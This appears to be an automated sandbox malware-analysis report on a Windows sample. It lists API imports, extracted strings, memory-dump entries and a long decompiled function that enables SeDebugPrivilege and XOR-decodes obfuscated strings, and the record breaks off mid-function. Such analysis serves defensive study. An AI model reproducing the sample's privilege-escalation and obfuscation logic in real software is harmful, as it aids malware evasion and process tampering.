GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003B7705
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B7766
LoadLibraryA.KERNEL32(?), ref: 003B77E8
GetProcAddress.KERNEL32(00000000,?), ref: 003B77F3
SetLastError.KERNEL32(00000000), ref: 003B7848
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B789D
CloseHandle.KERNEL32(00000000), ref: 003B78AD
GetCurrentProcess.KERNEL32 ref: 003B78CE
OpenProcessToken.ADVAPI32(00000000,00000020,?), ref: 003B78DB
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,00000037), ref: 003B78F0
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 003B7923
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B797B
CloseHandle.KERNEL32(00000000), ref: 003B7990
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B7A36
CloseHandle.KERNEL32(00000000), ref: 003B7A82

Strings

or~x, xrefs: 003B7781
NN, xrefs: 003B79FF
[^K/, xrefs: 003B7619
nn, xrefs: 003B7788
!, xrefs: 003B7737
7, xrefs: 003B763E
mxsM, xrefs: 003B777A
SeDebugPrivilege, xrefs: 003B78E9
(P<, xrefs: 003B7A5C
mcf,, xrefs: 003B7866
gnak, xrefs: 003B7729
cj!!, xrefs: 003B7730
j||/, xrefs: 003B7722

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$CloseHandleProcessWindow$FindSleepToken$AddressAdjustCurrentErrorLastLibraryLoadLookupOpenPrivilegePrivilegesProcThreadValue
String ID: !$(P<$7$NN$SeDebugPrivilege$[^K/$cj!!$gnak$j||/$mcf,$mxsM$nn$or~x
API String ID: 563414743-1374597537
Opcode ID: 40538601f26e67082396ac50c6ebd223dddc960c833e5b85945d4f8449a52653
Instruction ID: f631bc1436a88c9a30d3d9c9c5997db842490f4b9e1d163d7b79fac24747f6e4
Opcode Fuzzy Hash: 40538601f26e67082396ac50c6ebd223dddc960c833e5b85945d4f8449a52653
Instruction Fuzzy Hash: ADE1DF30D082989FDF02CFB8D8487EEBBB5AF6A304F145199E584BB252C7741649DB61

Uniqueness

Uniqueness Score: -1.00%

Function 003BA100 Relevance: 49.4, APIs: 4, Strings: 23, Instructions: 2150
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E003BA100(void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				signed char _v35;
				signed char _v36;
				signed char _v37;
				signed char _v38;
				signed char _v39;
				char _v40;
				signed char _v41;
				signed char _v42;
				signed char _v43;
				signed int _v44;
				char _v45;
				char _v46;
				char _v47;
				signed int _v48;
				char _v51;
				signed int _v52;
				char _v55;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v92;
				char _v95;
				signed char _v96;
				signed char _v97;
				signed char _v98;
				signed char _v99;
				signed char _v100;
				signed char _v101;
				signed char _v102;
				signed char _v103;
				signed int _v104;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				signed int _v161;
				char _v168;
				intOrPtr _v172;
				char _v208;
				signed int _t1119;
				signed int _t1120;
				char* _t1124;
				void* _t1219;
				void* _t1220;
				void* _t1224;
				char _t1255;
				char* _t1256;
				void* _t1258;
				void* _t1260;
				char _t1281;
				char* _t1282;
				void* _t1284;
				void* _t1286;
				char _t1300;
				char* _t1301;
				void* _t1303;
				void* _t1305;
				char _t1326;
				char* _t1327;
				void* _t1329;
				void* _t1331;
				intOrPtr _t1334;
				char _t1363;
				char* _t1364;
				void* _t1366;
				void* _t1368;
				char _t1384;
				char* _t1385;
				void* _t1387;
				void* _t1389;
				char _t1409;
				char* _t1410;
				void* _t1412;
				void* _t1414;
				char _t1432;
				char* _t1433;
				void* _t1435;
				void* _t1437;
				void* _t1460;
				void* _t1470;
				signed char _t1484;
				void* _t1504;
				void* _t1524;
				signed char _t1577;
				signed char _t1578;
				void* _t1620;
				signed char _t1645;
				char _t1657;
				char _t1661;
				char _t1666;
				signed char _t1674;
				signed char _t1683;
				intOrPtr _t1685;
				void* _t1702;
				void* _t1709;
				void* _t1716;
				void* _t1723;
				void* _t1730;
				void* _t1737;
				void* _t1744;
				signed char _t1751;
				char* _t1895;
				void* _t1962;
				void* _t1969;
				signed char _t1976;
				signed char _t1983;
				signed char _t1993;
				void* _t2000;
				signed char _t2007;
				void* _t2014;
				signed char _t2021;
				void* _t2028;
				void* _t2035;
				void* _t2042;
				void* _t2049;
				signed char _t2059;
				void* _t2066;
				void* _t2073;
				void* _t2080;
				signed char _t2087;
				void* _t2094;
				signed char _t2104;
				intOrPtr _t2111;
				signed char _t2118;
				signed char _t2126;
				intOrPtr _t2128;
				intOrPtr* _t2131;
				void* _t2133;
				void* _t2134;
				void* _t2135;
				void* _t2136;
				void* _t2140;
				void* _t2141;
				void* _t2142;
				void* _t2143;
				signed int _t2144;
				void* _t2145;
				void* _t2150;
				signed char _t2151;
				void* _t2152;
				void* _t2153;
				void* _t2154;
				void* _t2155;
				void* _t2158;

				_t2111 = __edx;
				_t1119 =  *0x3c500c; // 0x4b5ee95b
				_t1120 = _t1119 ^ _t2144;
				_v20 = _t1120;
				 *[fs:0x0] =  &_v16;
				_t2131 = __imp___time64;
				srand( *_t2131(0, _t1120, __edi, __esi, __ebx,  *[fs:0x0], E003BFD82, 0xffffffff));
				_t1657 = 0;
				_v168 = 0;
				_v28 =  *_t2131(0);
				_t1124 =  &_v28;
				_v24 = _t2111;
				__imp___localtime64(_t1124);
				_t2150 = _t2145 - 0xc4 + 0x10;
				_t2128 =  *((intOrPtr*)(_t1124 + 0xc));
				_t1685 =  *((intOrPtr*)(_t1124 + 0x10));
				_v172 = _t1685;
				if(_t2128 - 0x1e <= 1) {
					_t1657 =  ==  ? 1 : 0;
					_v168 = _t1657;
				}
				if(_t2128 > 0x11 || _t1685 != 0) {
					if(_t1657 != 0) {
						goto L6;
					}
				} else {
					_v168 = 1;
					L6:
					_t2087 = 0x49;
					_v44 = 0x27200349;
					_v40 = 0x692c252e;
					_t1620 = 0;
					_v36 = 0x25252c2b;
					_v32 = 0x3a;
					while(1) {
						 *(_t2144 + _t1620 - 0x27) =  *(_t2144 + _t1620 - 0x27) ^ _t2087;
						_t1620 = _t1620 + 1;
						if(_t1620 >= 0xc) {
							break;
						}
						_t2087 = _v44;
					}
					_v31 = 0;
					E003B4EE0( &_v140,  &_v43);
					_v8 = 0;
					E003B4F20( &_v92);
					_v8 = 1;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x596818;
					_v64 = 0x6000;
					_v8 = 2;
					E003B4E10( &_v140);
					_v8 = 3;
					E003BC2C0( &_v92);
					_v8 = 4;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					asm("movaps xmm0, [0x3c1840]");
					_t2094 = 0;
					asm("movups [ebp-0x2c], xmm0");
					_v32 = 0;
					do {
						 *(_t2144 + _t2094 - 0x2b) =  *(_t2144 + _t2094 - 0x2b) ^ _v48;
						_t2094 = _t2094 + 1;
					} while (_t2094 < 0x10);
					_v31 = 0;
					E003B4EE0( &_v140,  &_v47);
					_v8 = 5;
					E003B4F20( &_v92);
					_v8 = 6;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x6c1b00;
					_v64 = 0x2d80;
					_v8 = 7;
					E003B4E10( &_v140);
					_v8 = 8;
					E003BC2C0( &_v92);
					_v8 = 9;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_v104 = 0x20;
					_v103 = 0x57;
					_t1645 = _v104 ^ _v104;
					_v95 = 0;
					_v99 = _t1645;
					_v95 = 0;
					_t2104 = 0x0000004f ^ _t1645 ^ _t1645;
					_v102 = _t2104;
					_v98 = _t2104;
					_t2126 = 0x00000052 ^ _t1645 ^ _t1645;
					_v101 = _t2126;
					_t1683 = 0x0000004b ^ _t1645 ^ _t1645;
					_v100 = _t1683;
					_v97 = _t2126;
					_v96 = _t1683;
					E003B4EE0( &_v140,  &_v103);
					_v8 = 0xa;
					E003B4F20( &_v92);
					_v8 = 0xb;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x6ae7c8;
					_v64 = 0x13338;
					_v8 = 0xc;
					E003B4E10( &_v140);
					_v8 = 0xd;
					E003BC2C0( &_v92);
					_v8 = 0xe;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
				}
				_v96 = 0;
				_v100 = 0x32;
				_v96 = 0;
				_v99 = 0x45;
				_v98 = 0x2e;
				_v97 = 0x54;
				E003B4EE0( &_v140,  &_v99);
				_v8 = 0xf;
				E003B4F20( &_v92);
				_v8 = 0x10;
				E003B4DE0( &_v92,  &_v140);
				_v60 = 0x64;
				_v68 = 0x5b5ea8;
				_v64 = 0x8d7a;
				_v8 = 0x11;
				E003B4E10( &_v140);
				_v8 = 0x12;
				E003BC2C0( &_v92);
				_v8 = 0x13;
				E003B4E10( &_v92);
				_v8 = 0xffffffff;
				_v100 = 0x4a;
				_v95 = 0;
				_v99 = 0x54;
				_v95 = 0;
				_t2115 = 0x49;
				_v98 = 0x47;
				_v97 = 0x49;
				_v96 = 0xc;
				E003B4EE0( &_v140,  &_v99);
				_v8 = 0x14;
				E003B4F20( &_v92);
				_v8 = 0x15;
				E003B4DE0( &_v92,  &_v140);
				_v60 = 0x64;
				_v68 = 0x6c4880;
				_v64 = 0x136a5;
				_v8 = 0x16;
				E003B4E10( &_v140);
				_v8 = 0x17;
				E003BC2C0( &_v92);
				_v8 = 0x18;
				E003B4E10( &_v92);
				_v8 = 0xffffffff;
				_t1702 = 0;
				asm("movaps xmm0, [0x3c1c30]");
				asm("movups [ebp-0x30], xmm0");
				_v36 = 0x80539;
				_v32 = 8;
				do {
					 *(_t2144 + _t1702 - 0x2f) =  *(_t2144 + _t1702 - 0x2f) ^ _v52;
					_t1702 = _t1702 + 1;
				} while (_t1702 < 0x14);
				_v31 = 0;
				E003B4EE0( &_v140,  &_v51);
				_v8 = 0x19;
				E003B4F20( &_v92);
				_v8 = 0x1a;
				E003B4DE0( &_v92,  &_v140);
				_v60 = 0x64;
				_v68 = 0x626dd8;
				_v64 = 0x6344;
				_v8 = 0x1b;
				E003B4E10( &_v140);
				_v8 = 0x1c;
				E003BC2C0( &_v92);
				_v8 = 0x1d;
				E003B4E10( &_v92);
				_v8 = 0xffffffff;
				_t1709 = 0;
				asm("movaps xmm0, [0x3c1c80]");
				asm("movups [ebp-0x30], xmm0");
				_v36 = 0x575d;
				_v34 = 0;
				do {
					 *(_t2144 + _t1709 - 0x2f) =  *(_t2144 + _t1709 - 0x2f) ^ _v52;
					_t1709 = _t1709 + 1;
				} while (_t1709 < 0x11);
				_v34 = 0;
				E003B4EE0( &_v140,  &_v51);
				_v8 = 0x1e;
				E003B4F20( &_v92);
				_v8 = 0x1f;
				E003B4DE0( &_v92,  &_v140);
				_v60 = 0x64;
				_v68 = 0x6a75e8;
				_v64 = 0x71db;
				_v8 = 0x20;
				E003B4E10( &_v140);
				_v8 = 0x21;
				E003BC2C0( &_v92);
				_v8 = 0x22;
				E003B4E10( &_v92);
				_v8 = 0xffffffff;
				_t1716 = 0;
				asm("movaps xmm0, [0x3c1630]");
				asm("movups [ebp-0x2c], xmm0");
				do {
					 *(_t2144 + _t1716 - 0x2b) =  *(_t2144 + _t1716 - 0x2b) ^ _v48;
					_t1716 = _t1716 + 1;
				} while (_t1716 < 0xe);
				_v33 = 0;
				E003B4EE0( &_v140,  &_v47);
				_v8 = 0x23;
				E003B4F20( &_v92);
				_v8 = 0x24;
				E003B4DE0( &_v92,  &_v140);
				_v60 = 0x64;
				_v68 = 0x5e0548;
				_v64 = 0x1303f;
				_v8 = 0x25;
				E003B4E10( &_v140);
				_v8 = 0x26;
				E003BC2C0( &_v92);
				_v8 = 0x27;
				E003B4E10( &_v92);
				_v8 = 0xffffffff;
				_t1723 = 0;
				asm("movaps xmm0, [0x3c1d10]");
				asm("movups [ebp-0x30], xmm0");
				_v36 = 0x70737c;
				do {
					 *(_t2144 + _t1723 - 0x2f) =  *(_t2144 + _t1723 - 0x2f) ^ _v52;
					_t1723 = _t1723 + 1;
				} while (_t1723 < 0x12);
				_v33 = 0;
				E003B4EE0( &_v140,  &_v51);
				_v8 = 0x28;
				E003B4F20( &_v92);
				_v8 = 0x29;
				E003B4DE0( &_v92,  &_v140);
				_v60 = 0x64;
				_v68 = 0x601cb0;
				_v64 = 0x6ae1;
				_v8 = 0x2a;
				E003B4E10( &_v140);
				_v8 = 0x2b;
				E003BC2C0( &_v92);
				_v8 = 0x2c;
				E003B4E10( &_v92);
				_t1661 = _v168;
				_v8 = 0xffffffff;
				if(0xc == 0) {
					asm("movaps xmm0, [0x3c15d0]");
					_t1962 = 0;
					asm("movups [ebp-0x2c], xmm0");
					do {
						 *(_t2144 + _t1962 - 0x2b) =  *(_t2144 + _t1962 - 0x2b) ^ _v48;
						_t1962 = _t1962 + 1;
					} while (_t1962 < 0xe);
					_v33 = 0;
					E003B4EE0( &_v140,  &_v47);
					_v8 = 0x2d;
					E003B4F20( &_v92);
					_v8 = 0x2e;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x684dc0;
					_v64 = 0x15187;
					_v8 = 0x2f;
					E003B4E10( &_v140);
					_v8 = 0x30;
					E003BC2C0( &_v92);
					_v8 = 0x31;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t1969 = 0;
					asm("movaps xmm0, [0x3c1bb0]");
					asm("movups [ebp-0x2c], xmm0");
					_v32 = 0x5a;
					do {
						 *(_t2144 + _t1969 - 0x2b) =  *(_t2144 + _t1969 - 0x2b) ^ _v48;
						_t1969 = _t1969 + 1;
					} while (_t1969 < 0x10);
					_v31 = 0;
					E003B4EE0( &_v140,  &_v47);
					_v8 = 0x32;
					E003B4F20( &_v92);
					_v8 = 0x33;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x6e8b68;
					_v64 = 0xa60d;
					_v8 = 0x34;
					E003B4E10( &_v140);
					_v8 = 0x35;
					E003BC2C0( &_v92);
					_v8 = 0x36;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t1976 = 0x59;
					_v44 = 0x383c0b59;
					_t1460 = 0;
					_v40 = 0x2d79203d;
					_v36 = 0x301d7936;
					_v32 = 0x3c;
					asm("o16 nop [eax+eax]");
					while(1) {
						 *(_t2144 + _t1460 - 0x27) =  *(_t2144 + _t1460 - 0x27) ^ _t1976;
						_t1460 = _t1460 + 1;
						if(_t1460 >= 0xc) {
							break;
						}
						_t1976 = _v44;
					}
					_v31 = 0;
					E003B4EE0( &_v140,  &_v43);
					_v8 = 0x37;
					E003B4F20( &_v92);
					_v8 = 0x38;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x5cc9f0;
					_v64 = 0x778e;
					_v8 = 0x39;
					E003B4E10( &_v140);
					_v8 = 0x3a;
					E003BC2C0( &_v92);
					_v8 = 0x3b;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t1983 = 0x42;
					_v48 = 0x21230842;
					_t1470 = 0;
					_v44 = 0x2c236229;
					_v40 = 0x230e6226;
					_v36 = 0x3b26;
					_v34 = 0;
					while(1) {
						 *(_t2144 + _t1470 - 0x2b) =  *(_t2144 + _t1470 - 0x2b) ^ _t1983;
						_t1470 = _t1470 + 1;
						if(_t1470 >= 0xd) {
							break;
						}
						_t1983 = _v48;
					}
					_v34 = 0;
					E003B4EE0( &_v140,  &_v47);
					_v8 = 0x3c;
					E003B4F20( &_v92);
					_v8 = 0x3d;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x5bec28;
					_v64 = 0xddc4;
					_v8 = 0x3e;
					E003B4E10( &_v140);
					_v8 = 0x3f;
					E003BC2C0( &_v92);
					_v8 = 0x40;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_v104 = 0x4f;
					_v103 = 0x00000009 ^ _v104;
					_v95 = 0;
					_t1484 = _v104 ^ _v104;
					_v95 = 0;
					_v99 = _t1484;
					_t1993 = 0x0000003b ^ _t1484 ^ _t1484;
					_v102 = _t1993;
					_t2118 = 0x0000002a ^ _t1484;
					_v98 = _t1993;
					_t1674 = 0x0000003d ^ _t1484;
					_v101 = _t2118;
					_v100 = _t1674;
					_v97 = _t2118 ^ _t1484;
					_v96 = _t1674 ^ _t1484;
					E003B4EE0( &_v140,  &_v103);
					_v8 = 0x41;
					E003B4F20( &_v92);
					_v8 = 0x42;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x608798;
					_v64 = 0xdb53;
					_v8 = 0x43;
					E003B4E10( &_v140);
					_v8 = 0x44;
					E003BC2C0( &_v92);
					_v8 = 0x45;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t2000 = 0;
					asm("movaps xmm0, [0x3c1960]");
					asm("movups [ebp-0x2c], xmm0");
					_v32 = 0x3e;
					do {
						 *(_t2144 + _t2000 - 0x2b) =  *(_t2144 + _t2000 - 0x2b) ^ _v48;
						_t2000 = _t2000 + 1;
					} while (_t2000 < 0x10);
					_v31 = 0;
					E003B4EE0( &_v140,  &_v47);
					_v8 = 0x46;
					E003B4F20( &_v92);
					_v8 = 0x47;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x550fb0;
					_v64 = 0x9dd9;
					_v8 = 0x48;
					E003B4E10( &_v140);
					_v8 = 0x49;
					E003BC2C0( &_v92);
					_v8 = 0x4a;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t2007 = 0x64;
					_v44 = 0x16052964;
					_t1504 = 0;
					_v40 = 0x10a0b0d;
					_v36 = 0x17011010;
					_v32 = 0;
					while(1) {
						 *(_t2144 + _t1504 - 0x27) =  *(_t2144 + _t1504 - 0x27) ^ _t2007;
						_t1504 = _t1504 + 1;
						if(_t1504 >= 0xb) {
							break;
						}
						_t2007 = _v44;
					}
					_v32 = 0;
					E003B4EE0( &_v140,  &_v43);
					_v8 = 0x4b;
					E003B4F20( &_v92);
					_v8 = 0x4c;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x66dc20;
					_v64 = 0xf59c;
					_v8 = 0x4d;
					E003B4E10( &_v140);
					_v8 = 0x4e;
					E003BC2C0( &_v92);
					_v8 = 0x4f;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t2014 = 0;
					asm("movaps xmm0, [0x3c1fd0]");
					asm("movups [ebp-0x30], xmm0");
					_v36 = 0x787d;
					_v34 = 0;
					do {
						 *(_t2144 + _t2014 - 0x2f) =  *(_t2144 + _t2014 - 0x2f) ^ _v52;
						_t2014 = _t2014 + 1;
					} while (_t2014 < 0x11);
					_v34 = 0;
					E003B4EE0( &_v140,  &_v51);
					_v8 = 0x50;
					E003B4F20( &_v92);
					_v8 = 0x51;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x5d4180;
					_v64 = 0xc3c1;
					_v8 = 0x52;
					E003B4E10( &_v140);
					_v8 = 0x53;
					E003BC2C0( &_v92);
					_v8 = 0x54;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t2021 = 0x58;
					_v44 = 0x362d0858;
					_t1524 = 0;
					_v40 = 0x2d3e7833;
					_v36 = 0x392a3d36;
					_v32 = 0x34;
					while(1) {
						 *(_t2144 + _t1524 - 0x27) =  *(_t2144 + _t1524 - 0x27) ^ _t2021;
						_t1524 = _t1524 + 1;
						if(_t1524 >= 0xc) {
							break;
						}
						_t2021 = _v44;
					}
					_v31 = 0;
					E003B4EE0( &_v140,  &_v43);
					_v8 = 0x55;
					E003B4F20( &_v92);
					_v8 = 0x56;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x5fcab8;
					_v64 = 0x51f5;
					_v8 = 0x57;
					E003B4E10( &_v140);
					_v8 = 0x58;
					E003BC2C0( &_v92);
					_v8 = 0x59;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t2028 = 0;
					asm("movaps xmm0, [0x3c1c00]");
					asm("movups [ebp-0x30], xmm0");
					_v36 = 0x454c;
					_v34 = 0;
					do {
						 *(_t2144 + _t2028 - 0x2f) =  *(_t2144 + _t2028 - 0x2f) ^ _v52;
						_t2028 = _t2028 + 1;
					} while (_t2028 < 0x11);
					_v34 = 0;
					E003B4EE0( &_v140,  &_v51);
					_v8 = 0x5a;
					E003B4F20( &_v92);
					_v8 = 0x5b;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x659340;
					_v64 = 0x58a4;
					_v8 = 0x5c;
					E003B4E10( &_v140);
					_v8 = 0x5d;
					E003BC2C0( &_v92);
					_v8 = 0x5e;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t2035 = 0;
					asm("movaps xmm0, [0x3c1b70]");
					asm("movups [ebp-0x30], xmm0");
					_v36 = 0x61616e6b;
					_v32 = 0;
					do {
						 *(_t2144 + _t2035 - 0x2f) =  *(_t2144 + _t2035 - 0x2f) ^ _v52;
						_t2035 = _t2035 + 1;
					} while (_t2035 < 0x13);
					_v32 = 0;
					E003B4EE0( &_v140,  &_v51);
					_v8 = 0x5f;
					E003B4F20( &_v92);
					_v8 = 0x60;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x548660;
					_v64 = 0x894a;
					_v8 = 0x61;
					E003B4E10( &_v140);
					_v8 = 0x62;
					E003BC2C0( &_v92);
					_v8 = 0x63;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t2042 = 0;
					asm("movaps xmm0, [0x3c1e40]");
					asm("movups [ebp-0x2c], xmm0");
					_v32 = 0;
					do {
						 *(_t2144 + _t2042 - 0x2b) =  *(_t2144 + _t2042 - 0x2b) ^ _v48;
						_t2042 = _t2042 + 1;
					} while (_t2042 < 0xf);
					_v32 = 0;
					E003B4EE0( &_v140,  &_v47);
					_v8 = 0x64;
					E003B4F20( &_v92);
					_v8 = 0x65;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x65ebe8;
					_v64 = 0xf032;
					_v8 = 0x66;
					E003B4E10( &_v140);
					_v8 = 0x67;
					E003BC2C0( &_v92);
					_v8 = 0x68;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t2049 = 0;
					asm("movaps xmm0, [0x3c1980]");
					asm("movups [ebp-0x34], xmm0");
					_v40 = 0x347c3934;
					_v36 = 0x283d;
					_v34 = 0;
					do {
						 *(_t2144 + _t2049 - 0x33) =  *(_t2144 + _t2049 - 0x33) ^ _v56;
						_t2049 = _t2049 + 1;
					} while (_t2049 < 0x15);
					_v34 = 0;
					E003B4EE0( &_v140,  &_v55);
					_v8 = 0x69;
					E003B4F20( &_v92);
					_v8 = 0x6a;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x56a138;
					_v64 = 0x51fa;
					_v8 = 0x6b;
					E003B4E10( &_v140);
					_v8 = 0x6c;
					E003BC2C0( &_v92);
					_v8 = 0x6d;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_v44 = 0x13;
					_v43 = 0x00000044 ^ _v44;
					_t1577 = _v44;
					_v161 = 0x2c;
					_t2059 = 0x00000033 ^ _t1577 ^ _t1577;
					_v42 = _t2059;
					_v38 = _t2059;
					_t1578 = _t1577 ^ _t1577;
					_v34 = 0;
					_v39 = _t1578;
					_t2115 = 0x00000066 ^ _t1578;
					_v41 = _t2115;
					_v37 = _t2115;
					_v34 = 0;
					_v40 = 0x67;
					_v35 = _v161 ^ _v44;
					_v36 = 0x00000063 ^ _t1578;
					E003B4EE0( &_v140,  &_v43);
					_v8 = 0x6e;
					E003B4F20( &_v92);
					_v8 = 0x6f;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x78;
					_v68 = 0x59c818;
					_v64 = 0xdfab;
					_v8 = 0x70;
					E003B4E10( &_v140);
					_v8 = 0x71;
					E003BC2C0( &_v92);
					_v8 = 0x72;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t2066 = 0;
					asm("movaps xmm0, [0x3c19e0]");
					asm("movups [ebp-0x30], xmm0");
					_v36 = 0x63657f78;
					_v32 = 0x75;
					do {
						 *(_t2144 + _t2066 - 0x2f) =  *(_t2144 + _t2066 - 0x2f) ^ _v52;
						_t2066 = _t2066 + 1;
					} while (_t2066 < 0x14);
					_v31 = 0;
					E003B4EE0( &_v140,  &_v51);
					_v8 = 0x73;
					E003B4F20( &_v92);
					_v8 = 0x74;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x699f48;
					_v64 = 0xd69b;
					_v8 = 0x75;
					E003B4E10( &_v140);
					_v8 = 0x76;
					E003BC2C0( &_v92);
					_v8 = 0x77;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t2073 = 0;
					asm("movaps xmm0, [0x3c1e30]");
					asm("movups [ebp-0x30], xmm0");
					_v36 = 0x72636576;
					_v32 = 0x73;
					do {
						 *(_t2144 + _t2073 - 0x2f) =  *(_t2144 + _t2073 - 0x2f) ^ _v52;
						_t2073 = _t2073 + 1;
					} while (_t2073 < 0x14);
					_v31 = 0;
					E003B4EE0( &_v140,  &_v51);
					_v8 = 0x78;
					E003B4F20( &_v92);
					_v8 = 0x79;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x56f338;
					_v64 = 0xffa2;
					_v8 = 0x7a;
					E003B4E10( &_v140);
					_v8 = 0x7b;
					E003BC2C0( &_v92);
					_v8 = 0x7c;
					E003B4E10( &_v92);
					_v8 = 0xffffffff;
					_t2080 = 0;
					asm("movaps xmm0, [0x3c1ce0]");
					asm("movups [ebp-0x30], xmm0");
					_v36 = 0x5a49;
					_v34 = 0;
					do {
						 *(_t2144 + _t2080 - 0x2f) =  *(_t2144 + _t2080 - 0x2f) ^ _v52;
						_t2080 = _t2080 + 1;
					} while (_t2080 < 0x11);
					_v34 = 0;
					E003B4EE0( &_v140,  &_v51);
					_v8 = 0x7d;
					E003B4F20( &_v92);
					_v8 = 0x7e;
					E003B4DE0( &_v92,  &_v140);
					_v60 = 0x64;
					_v68 = 0x67d1c0;
					_v64 = 0x7bfa;
					_v8 = 0x7f;
					E003B4E10( &_v140);
					_v8 = 0x80;
					E003BC2C0( &_v92);
					_v8 = 0x81;
					E003B4E10( &_v92);
					_t1661 = _v168;
					_v8 = 0xffffffff;
				}
				asm("movaps xmm0, [0x3c1b40]");
				_t1730 = 0;
				asm("movups [ebp-0x2c], xmm0");
				_v32 = 0;
				do {
					 *(_t2144 + _t1730 - 0x2b) =  *(_t2144 + _t1730 - 0x2b) ^ _v48;
					_t1730 = _t1730 + 1;
				} while (_t1730 < 0xf);
				_v32 = 0;
				E003B4EE0( &_v140,  &_v47);
				_v8 = 0x82;
				E003B4F20( &_v92);
				_v8 = 0x83;
				E003B4DE0( &_v92,  &_v140);
				_v60 = 0x64;
				_v68 = 0x57f2e0;
				_v64 = 0x17535;
				_v8 = 0x84;
				E003B4E10( &_v140);
				_v8 = 0x85;
				E003BC2C0( &_v92);
				_v8 = 0x86;
				E003B4E10( &_v92);
				_v8 = 0xffffffff;
				_t1737 = 0;
				asm("movaps xmm0, [0x3c1b10]");
				asm("movups [ebp-0x34], xmm0");
				_v40 = 0x5d4e490f;
				_v36 = 0x4b46440f;
				_v32 = 0;
				do {
